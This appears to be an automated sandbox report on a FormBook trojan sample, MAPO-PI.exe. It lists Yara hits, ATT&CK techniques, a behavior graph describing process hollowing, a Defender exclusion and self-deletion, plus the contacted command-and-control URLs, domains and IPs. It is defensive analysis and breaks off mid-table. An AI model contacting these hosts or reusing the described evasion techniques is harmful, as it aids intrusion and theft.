          Source: Yara matchFile source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Query Registry1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1Input Capture1Security Software Discovery221Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery2SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSVirtualization/Sandbox Evasion31Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing11Proc FilesystemSystem Information Discovery112Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 510736 Sample: MAPO-PI.exe Startdate: 28/10/2021 Architecture: WINDOWS Score: 100 40 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->40 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 8 other signatures 2->46 10 MAPO-PI.exe 4 2->10         started        process3 file4 32 C:\Users\user\AppData\...\MAPO-PI.exe.log, ASCII 10->32 dropped 58 Adds a directory exclusion to Windows Defender 10->58 60 Tries to detect virtualization through RDTSC time measurements 10->60 14 MAPO-PI.exe 10->14         started        17 powershell.exe 25 10->17         started        signatures5 process6 signatures7 62 Modifies the context of a thread in another process (thread injection) 14->62 64 Maps a DLL or memory area into another process 14->64 66 Sample uses process hollowing technique 14->66 68 Queues an APC in another process (thread injection) 14->68 19 explorer.exe 14->19 injected 23 conhost.exe 17->23         started        process8 dnsIp9 34 www.transforming-leadership.com 159.65.10.143, 49790, 80 DIGITALOCEAN-ASNUS United States 19->34 36 diofis.com 109.232.217.55, 49795, 80 AEROTEK-ASTR Turkey 19->36 38 3 other IPs or domains 19->38 48 System process connects to network (likely due to code injection or exploit) 19->48 25 cmmon32.exe 19->25         started        signatures10 process11 signatures12 50 Self deletion via cmd delete 25->50 52 Modifies the context of a thread in another process (thread injection) 25->52 54 Maps a DLL or memory area into another process 25->54 56 Tries to detect virtualization through RDTSC time measurements 25->56 28 cmd.exe 1 25->28         started        process13 process14 30 conhost.exe 28->30         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          MAPO-PI.exe31%VirustotalBrowse
          MAPO-PI.exe39%ReversingLabsByteCode-MSIL.Trojan.Pwsx

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.0.MAPO-PI.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.2.MAPO-PI.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.0.MAPO-PI.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.0.MAPO-PI.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.diofis.com/hakkimizda/0%Avira URL Cloudsafe
          http://www.diofis.com/wp-includes/wlwmanifest.xml0%Avira URL Cloudsafe
          http://www.diofis.com/blog/0%Avira URL Cloudsafe
          http://www.diofis.com/2020/10/24/kahvaltilik-tarifler/0%Avira URL Cloudsafe
          http://www.diofis.com/hizmetlerimiz/hastaliklarda-beslenme-danismanligi/0%Avira URL Cloudsafe
          http://www.diofis.com/wp-content/themes/neve/style.min.css?ver=2.8.30%Avira URL Cloudsafe
          http://www.diofis.com/hizmetlerimiz/bireysel-beslenme-danismanligi/0%Avira URL Cloudsafe
          http://www.diofis.com/2020/10/24/saglikli-ve-pratik-roka-salatasi/0%Avira URL Cloudsafe
          http://www.diofis.com/#logo0%Avira URL Cloudsafe
          http://www.diofis.com/#organization0%Avira URL Cloudsafe
          http://www.diofis.com/2020/11/19/aspir-yagi/0%Avira URL Cloudsafe
          http://www.diofis.com/2020/10/24/maydanoz-cayi/0%Avira URL Cloudsafe
          http://www.diofis.com/category/guncel-diyet-meseleleri/0%Avira URL Cloudsafe
          http://www.collada.org/2005/11/COLLADASchema9Done0%URL Reputationsafe
          http://www.diofis.com/wp-content/uploads/2020/09/cropped-cropped-diofis-logo-2-3.png0%Avira URL Cloudsafe
          http://www.diofis.com/2020/10/24/elma-cayi/0%Avira URL Cloudsafe
          http://www.diofis.com/2020/11/01/cikolatali-toplar/0%Avira URL Cloudsafe
          http://www.diofis.com/hizmetlerimiz/0%Avira URL Cloudsafe
          http://www.diofis.com/2020/11/01/cennet-tatlisi/0%Avira URL Cloudsafe
          http://www.diofis.com/wp-json/0%Avira URL Cloudsafe
          http://www.diofis.com/2020/10/24/portakalli-meyve-cayi/0%Avira URL Cloudsafe
          https://m0n.co/ga0%Avira URL Cloudsafe
          www.diofis.com/rigx/0%Avira URL Cloudsafe
          http://www.diofis.com/2020/10/24/odem-cayi-2/0%Avira URL Cloudsafe
          http://www.diofis.com/category/sporcu-beslenmesi/0%Avira URL Cloudsafe
          http://www.diofis.com/wp-content/uploads/2020/09/cropped-diofis-logo-2.png0%Avira URL Cloudsafe
          http://www.diofis.com/feed/0%Avira URL Cloudsafe
          http://www.diofis.com/hizmetlerimiz/kurumsal-beslenme-danismanligi/0%Avira URL Cloudsafe
          http://www.diofis.com/category/tarifler/0%Avira URL Cloudsafe
          http://www.diofis.com?sccss=1&#038;ver=5.5.60%Avira URL Cloudsafe
          http://www.diofis.com/2020/10/24/saglikli-ve-pratik-corba-tarifi/0%Avira URL Cloudsafe
          http://www.diofis.com/2020/11/01/ketojenik-beslenme/0%Avira URL Cloudsafe
          http://www.diofis.com/comments/feed/0%Avira URL Cloudsafe
          http://www.diofis.com/hizmetlerimiz/cocukluk-cagi-beslenme-danismanligi/0%Avira URL Cloudsafe
          http://www.diofis.com/2020/10/24/sebze-corbasi-tarifi/0%Avira URL Cloudsafe
          http://www.diofis.com/2020/10/24/yulafli-kahvalti/0%Avira URL Cloudsafe
          http://www.diofis.com/2020/10/24/meyve-cayi/0%Avira URL Cloudsafe
          http://www.diofis.com/bize-ulasin/0%Avira URL Cloudsafe
          http://www.diofis.com/partnerlerimiz/0%Avira URL Cloudsafe
          http://www.diofis.com/xmlrpc.php?rsd0%Avira URL Cloudsafe
          http://www.diofis.com/2020/10/24/saglikli-ve-pratik-salata-tarifi/0%Avira URL Cloudsafe
          http://www.lifeinformpodcast.com/rigx/?8pr=9rQH8&1btd7D=sXodP5plw2zuBk5jc17bfKeMRD93SLnVb+AwVzSLCtQvXrT73UIO1hDRl0kooUZyQ/sm0%Avira URL Cloudsafe
          http://www.diofis.com/0%Avira URL Cloudsafe
          http://www.diofis.com/?s=0%Avira URL Cloudsafe
          http://www.transforming-leadership.com/rigx/?1btd7D=9134s0FnLt/OWarUedgABr9C/c4q5kSlc0KYi18j8Gti+B07oVRLIxAr1gTintGupYIr&8pr=9rQH80%Avira URL Cloudsafe
          http://www.diofis.com/2020/10/24/odem-cayi/0%Avira URL Cloudsafe
          http://www.diofis.com/rigx/?8pr=9rQH8&1btd7D=x7Tu96cHMgTmU7mY47TISrjDcbGhV6G9B99bVm0ZcSL4vblov6CXxXD4o82KDOntdPMV0%Avira URL Cloudsafe
          http://www.diofis.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.60%Avira URL Cloudsafe
          http://www.diofis.com/hizmetlerimiz/kilo-koruma-beslenme-danismanligi/0%Avira URL Cloudsafe
          http://www.diofis.com/2020/11/27/sporcu-beslenmesinde-yeterli-ve-dengeli-beslenmenin-onemi/0%Avira URL Cloudsafe
          http://www.diofis.com/hizmetlerimiz/online-beslenme-danismanligi/0%Avira URL Cloudsafe
          http://www.diofis.com/#website0%Avira URL Cloudsafe
          http://www.diofis.com/2020/10/24/rahatlatici-cay/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.transforming-leadership.com
          		159.65.10.143
          		truetrue
            		unknown
            lifeinformpodcast.com
            		34.102.136.180
            		truefalse
              		unknown
              diofis.com
              		109.232.217.55
              		truetrue
                		unknown
                www.diofis.com
                		unknown
                		unknowntrue
                  		unknown
                  www.lifeinformpodcast.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    www.diofis.com/rigx/true
                    • Avira URL Cloud: safe
                    		low
                    http://www.lifeinformpodcast.com/rigx/?8pr=9rQH8&1btd7D=sXodP5plw2zuBk5jc17bfKeMRD93SLnVb+AwVzSLCtQvXrT73UIO1hDRl0kooUZyQ/smfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.transforming-leadership.com/rigx/?1btd7D=9134s0FnLt/OWarUedgABr9C/c4q5kSlc0KYi18j8Gti+B07oVRLIxAr1gTintGupYIr&8pr=9rQH8true
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.diofis.com/rigx/?8pr=9rQH8&1btd7D=x7Tu96cHMgTmU7mY47TISrjDcbGhV6G9B99bVm0ZcSL4vblov6CXxXD4o82KDOntdPMVtrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.monsterinsights.com/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                      		high
                      http://www.diofis.com/hakkimizda/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://yoast.com/wordpress/plugins/seo/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        		high
                        http://www.diofis.com/wp-includes/wlwmanifest.xmlcmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/blog/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/2020/10/24/kahvaltilik-tarifler/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/hizmetlerimiz/hastaliklarda-beslenme-danismanligi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/wp-content/themes/neve/style.min.css?ver=2.8.3cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/hizmetlerimiz/bireysel-beslenme-danismanligi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/2020/10/24/saglikli-ve-pratik-roka-salatasi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/#logocmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/#organizationcmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/2020/11/19/aspir-yagi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/2020/10/24/maydanoz-cayi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/category/guncel-diyet-meseleleri/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.collada.org/2005/11/COLLADASchema9DoneMAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.diofis.com/wp-content/uploads/2020/09/cropped-cropped-diofis-logo-2-3.pngcmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/2020/10/24/elma-cayi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/2020/11/01/cikolatali-toplar/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/hizmetlerimiz/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/2020/11/01/cennet-tatlisi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/wp-json/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/2020/10/24/portakalli-meyve-cayi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmpfalse
                          		high
                          https://m0n.co/gacmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.diofis.com/2020/10/24/odem-cayi-2/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.diofis.com/category/sporcu-beslenmesi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.diofis.com/wp-content/uploads/2020/09/cropped-diofis-logo-2.pngcmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.diofis.com/feed/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.diofis.com/hizmetlerimiz/kurumsal-beslenme-danismanligi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.diofis.com/category/tarifler/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.diofis.com?sccss=1&#038;ver=5.5.6cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.diofis.com/2020/10/24/saglikli-ve-pratik-corba-tarifi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.w.org/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                            		high
                            http://www.diofis.com/2020/11/01/ketojenik-beslenme/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.diofis.com/comments/feed/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.diofis.com/hizmetlerimiz/cocukluk-cagi-beslenme-danismanligi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.diofis.com/2020/10/24/sebze-corbasi-tarifi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.diofis.com/2020/10/24/yulafli-kahvalti/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://schema.orgcmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                              		high
                              http://www.diofis.com/2020/10/24/meyve-cayi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://gmpg.org/xfn/11cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                		high
                                http://www.diofis.com/bize-ulasin/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.diofis.com/partnerlerimiz/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.diofis.com/xmlrpc.php?rsdcmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.diofis.com/2020/10/24/saglikli-ve-pratik-salata-tarifi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.diofis.com/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.diofis.com/?s=cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.diofis.com/2020/10/24/odem-cayi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.diofis.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.6cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.diofis.com/hizmetlerimiz/kilo-koruma-beslenme-danismanligi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.diofis.com/2020/11/27/sporcu-beslenmesinde-yeterli-ve-dengeli-beslenmenin-onemi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.diofis.com/hizmetlerimiz/online-beslenme-danismanligi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.diofis.com/#websitecmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.diofis.com/2020/10/24/rahatlatici-cay/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                34.102.136.180
                                		lifeinformpodcast.comUnited States
                                		15169GOOGLEUSfalse
                                159.65.10.143
                                		www.transforming-leadership.comUnited States
                                		14061DIGITALOCEAN-ASNUStrue
                                109.232.217.55
                                		diofis.comTurkey
                                		42807AEROTEK-ASTRtrue

                                General Information

                                Joe Sandbox Version:33.0.0 White Diamond
                                Analysis ID:510736
                                Start date:28.10.2021
                                Start time:07:39:13
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 9m 33s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:MAPO-PI.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:29
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:1
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@10/5@3/3
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 9% (good quality ratio 8%)
                                • Quality average: 72.1%
                                • Quality standard deviation: 32%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 84
                                • Number of non-executed functions: 165
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.82.210.154, 23.211.6.115, 23.211.4.86, 20.50.102.62, 40.112.88.60, 80.67.82.211, 80.67.82.235, 20.82.209.183
                                • Excluded domains from analysis (whitelisted): www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                07:40:04API Interceptor1x Sleep call for process: MAPO-PI.exe modified
                                07:40:08API Interceptor37x Sleep call for process: powershell.exe modified

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                DIGITALOCEAN-ASNUSdigital.alarmclock.alarmy.apkGet hashmaliciousBrowse
                                • 159.203.83.162
                                digital.alarmclock.alarmy.apkGet hashmaliciousBrowse
                                • 159.203.83.162
                                e6dff8475541ebddc1f0db47a311eb2c25581b7d5e62a.exeGet hashmaliciousBrowse
                                • 206.81.21.194
                                10272021-AM65Application.HTMGet hashmaliciousBrowse
                                • 5.101.110.225
                                v2.exeGet hashmaliciousBrowse
                                • 139.59.30.14
                                gqqrsjn4g8Get hashmaliciousBrowse
                                • 161.35.54.166
                                mdOr6C8jJpGet hashmaliciousBrowse
                                • 161.35.54.166
                                Order.exeGet hashmaliciousBrowse
                                • 138.197.164.163
                                scMacvapQQGet hashmaliciousBrowse
                                • 161.35.54.166
                                3Y8WDTH5lrGet hashmaliciousBrowse
